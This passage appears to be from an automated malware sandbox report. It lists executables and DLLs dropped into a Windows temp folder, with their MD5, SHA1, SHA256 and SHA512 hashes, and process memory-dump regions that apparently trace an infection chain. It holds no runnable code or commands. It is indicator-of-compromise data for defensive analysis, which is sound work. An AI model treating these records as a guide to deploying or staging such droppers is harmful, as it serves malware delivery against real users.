| SHA256 | eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc |
| SHA512 | e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60 |
C:\Users\Admin\AppData\Local\Temp\9438.exe
| MD5 | d0c59443e41e1160209139841fa39c9f |
| SHA1 | 76be0077ce9dc5ef6756b8c202a6d5d94c759535 |
| SHA256 | de3b8eeffa2d3ce30a578af1de877afd5831e428ca7c0767933d6e6af9ac815c |
| SHA512 | d954cd9752d04a8d182377505e5c9a9f942425daf99301e3a136d1dca7565d8b181485d08852194c1b9152752b75824ce55c052d3697bf0c54e48dfb56332f28 |
memory/4540-16-0x0000000074460000-0x0000000074C10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A04F.exe
| MD5 | 91d23595c11c7ee4424b6267aabf3600 |
| SHA1 | ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02 |
| SHA256 | d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47 |
| SHA512 | cb9ed75c14e7b093cabab66c22d412371c639ace31fbe976c71ffec6007bf85b3d7d3e591fe5612e2a035298398d32e1aa7dc0d753f93328ebc2ce8e44fb8d2b |
memory/844-21-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/844-22-0x0000000000BE0000-0x0000000000C1C000-memory.dmp
memory/4540-23-0x0000000000370000-0x0000000001826000-memory.dmp
memory/844-24-0x0000000007F40000-0x00000000084E4000-memory.dmp
memory/844-25-0x0000000007A30000-0x0000000007AC2000-memory.dmp
memory/844-27-0x0000000007B70000-0x0000000007B80000-memory.dmp
memory/844-28-0x00000000079C0000-0x00000000079CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 77471d919a5e2151fb49f37c315af514 |
| SHA1 | 0687047ed80aa348bdc1657731f21181995b654c |
| SHA256 | 52666594a3e8bd7ac277411e215e1f65a7771f7c1d5b00a9e6ec95fade64f1f1 |
| SHA512 | 6ffb45e79b03bac2820c98503793cd11c13803f49522eea9334c4c6cd05384dda3a60b0a8a8f363abc439ad444f1a8da290f0350fa69b75b6c3c9701177f8844 |
memory/844-41-0x0000000008B10000-0x0000000009128000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | cde750f39f58f1ec80ef41ce2f4f1db9 |
| SHA1 | 942ea40349b0e5af7583fd34f4d913398a9c3b96 |
| SHA256 | 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094 |
| SHA512 | c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | f81be07058935d224ab3843bff94fec0 |
| SHA1 | 1a7360901f8cb5017f7a41ca1a6984227b712b16 |
| SHA256 | 8d4df79cf6bf1cb8285b7358a7c6d92c7f665065999934b24c1175311d99fb6c |
| SHA512 | 342b2c767af972819c57091e9d9d65578522fa48549b6c40aad6791b0c65e186b377e3f095458e8b5d873ffdadd73897252a13bead652bd74a09540d2c27c96e |
memory/844-55-0x0000000007D80000-0x0000000007E8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 1f40433778e799319ae0ece36d28f00f |
| SHA1 | 4ce947e15182e61e379fbfbf52b6625cb0528c69 |
| SHA256 | 1d360b097bfd95b5e6312350928af25631973ff1ddfce7835ac5c8b239b9e58c |
| SHA512 | 30e0d4d61dd4535f7e09a0e0d49691dbb9f99ed54f01b4b898eb786b466cdba34e170677887831daa5e6f98bf2f0d8ca7729a2bf7949ee0ac043a617b419030f |
memory/844-66-0x0000000007B30000-0x0000000007B42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
C:\Users\Admin\AppData\Local\Temp\Broom.exe
| MD5 | 00e93456aa5bcf9f60f84b0c0760a212 |
| SHA1 | 6096890893116e75bd46fea0b8c3921ceb33f57d |
| SHA256 | ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504 |
| SHA512 | abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca |
memory/844-79-0x0000000007CB0000-0x0000000007CEC000-memory.dmp
memory/4700-81-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4540-84-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/1344-85-0x0000000000B50000-0x0000000000B51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
| MD5 | 5525670a9e72d77b368a9aa4b8c814c1 |
| SHA1 | 3fdad952ea00175f3a6e549b5dca4f568e394612 |
| SHA256 | 1180706added2a7899f08f25a9f88ecff5d003ba8964f918d00779565e4a6978 |
| SHA512 | 757249f7e67f82522a8e3079a22c5cf92111626446a32ad3ef876f23885f62d1bb5bf3238d564e23531d062fe18742568dfc00e33b049bb8eef05eb953ef981a |
memory/844-89-0x0000000007CF0000-0x0000000007D3C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/4880-104-0x0000000002100000-0x0000000002101000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_isdecmp.dll
| MD5 | a813d18268affd4763dde940246dc7e5 |
| SHA1 | c7366e1fd925c17cc6068001bd38eaef5b42852f |
| SHA256 | e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64 |
| SHA512 | b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4 |
memory/4840-109-0x0000000002A70000-0x0000000002E6A000-memory.dmp
memory/4700-110-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4840-214-0x0000000002E70000-0x000000000375B000-memory.dmp
memory/1344-233-0x0000000000400000-0x0000000000965000-memory.dmp
C:\Program Files (x86)\xrecode3\xrecode3.exe
| MD5 | aa9f5a4dbd05ae5fbefe5cea48f2f355 |
| SHA1 | ea851b9f6521875a8a550d9c788bd11750ae6151 |
| SHA256 | 0f01b2ad6d8723a6d2195080d2fba1eb2e853510828e27c47299efa34956ef02 |
| SHA512 | dfb39816d508dba9a3ac74d6c27829e8415c39482f6de21171767f3f1fcddc0cf443608b1ca0e4c45ce0241c7ebffa4c324701d73e207917181671ae6f6ff521 |
memory/3332-239-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/4840-241-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2132-243-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2132-242-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2132-246-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2132-247-0x0000000000400000-0x0000000000785000-memory.dmp
memory/844-248-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/4632-249-0x00000000009D0000-0x0000000000AD0000-memory.dmp
memory/4632-250-0x00000000023E0000-0x00000000023E9000-memory.dmp
memory/3356-251-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4880-254-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/844-255-0x0000000007B70000-0x0000000007B80000-memory.dmp
memory/3356-257-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4028-258-0x0000000000400000-0x0000000000785000-memory.dmp
memory/4840-259-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3384-261-0x00000000020E0000-0x00000000020F6000-memory.dmp
memory/3356-262-0x0000000000400000-0x0000000000409000-memory.dmp
memory/844-266-0x0000000007ED0000-0x0000000007F36000-memory.dmp
memory/1344-267-0x0000000000400000-0x0000000000965000-memory.dmp
memory/1344-269-0x0000000000B50000-0x0000000000B51000-memory.dmp
memory/3664-270-0x0000000003230000-0x0000000003266000-memory.dmp
memory/3664-271-0x0000000074460000-0x0000000074C10000-memory.dmp
memory/3664-272-0x0000000005420000-0x0000000005430000-memory.dmp
memory/4880-273-0x0000000002100000-0x0000000002101000-memory.dmp
memory/844-274-0x0000000009400000-0x00000000095C2000-memory.dmp
memory/4840-275-0x0000000002A70000-0x0000000002E6A000-memory.dmp
memory/3664-278-0x0000000005A60000-0x0000000006088000-memory.dmp
memory/844-277-0x0000000009B00000-0x000000000A02C000-memory.dmp
memory/3664-276-0x0000000005420000-0x0000000005430000-memory.dmp
memory/3664-279-0x0000000006090000-0x00000000060B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hda52irk.xjc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3664-285-0x0000000006130000-0x0000000006196000-memory.dmp
memory/3664-290-0x0000000006380000-0x00000000066D4000-memory.dmp
memory/3664-291-0x00000000067C0000-0x00000000067DE000-memory.dmp
memory/4028-293-0x0000000000400000-0x0000000000785000-memory.dmp
memory/4840-294-0x0000000002E70000-0x000000000375B000-memory.dmp
memory/3664-295-0x0000000006D80000-0x0000000006DC4000-memory.dmp
memory/4840-296-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3664-299-0x0000000005420000-0x0000000005430000-memory.dmp
memory/3664-300-0x0000000007B70000-0x0000000007BE6000-memory.dmp
memory/3664-301-0x0000000008270000-0x00000000088EA000-memory.dmp
memory/3664-302-0x0000000007BF0000-0x0000000007C0A000-memory.dmp
memory/3332-303-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/4840-304-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2724-305-0x000001A87B790000-0x000001A87B7B2000-memory.dmp
memory/2724-306-0x00007FFAFD8F0000-0x00007FFAFE3B1000-memory.dmp
memory/4028-307-0x0000000000400000-0x0000000000785000-memory.dmp
memory/2724-317-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
memory/2724-318-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
memory/3664-320-0x0000000007DB0000-0x0000000007DE2000-memory.dmp
memory/3664-321-0x0000000070AD0000-0x0000000070B1C000-memory.dmp
memory/3664-322-0x000000006C1C0000-0x000000006C514000-memory.dmp
memory/3664-332-0x0000000007D90000-0x0000000007DAE000-memory.dmp
memory/3664-333-0x0000000007DF0000-0x0000000007E93000-memory.dmp
memory/2724-334-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
memory/3664-335-0x0000000007EE0000-0x0000000007EEA000-memory.dmp
memory/844-336-0x0000000009820000-0x0000000009870000-memory.dmp
memory/2724-337-0x000001A87B3C0000-0x000001A87B3D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e243a38635ff9a06c87c2a61a2200656 |
| SHA1 | ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc |
| SHA256 | af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f |
| SHA512 | 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4 |
memory/4840-367-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3332-370-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/3332-377-0x00007FF679FE0000-0x00007FF67A581000-memory.dmp
memory/4028-379-0x0000000000400000-0x0000000000785000-memory.dmp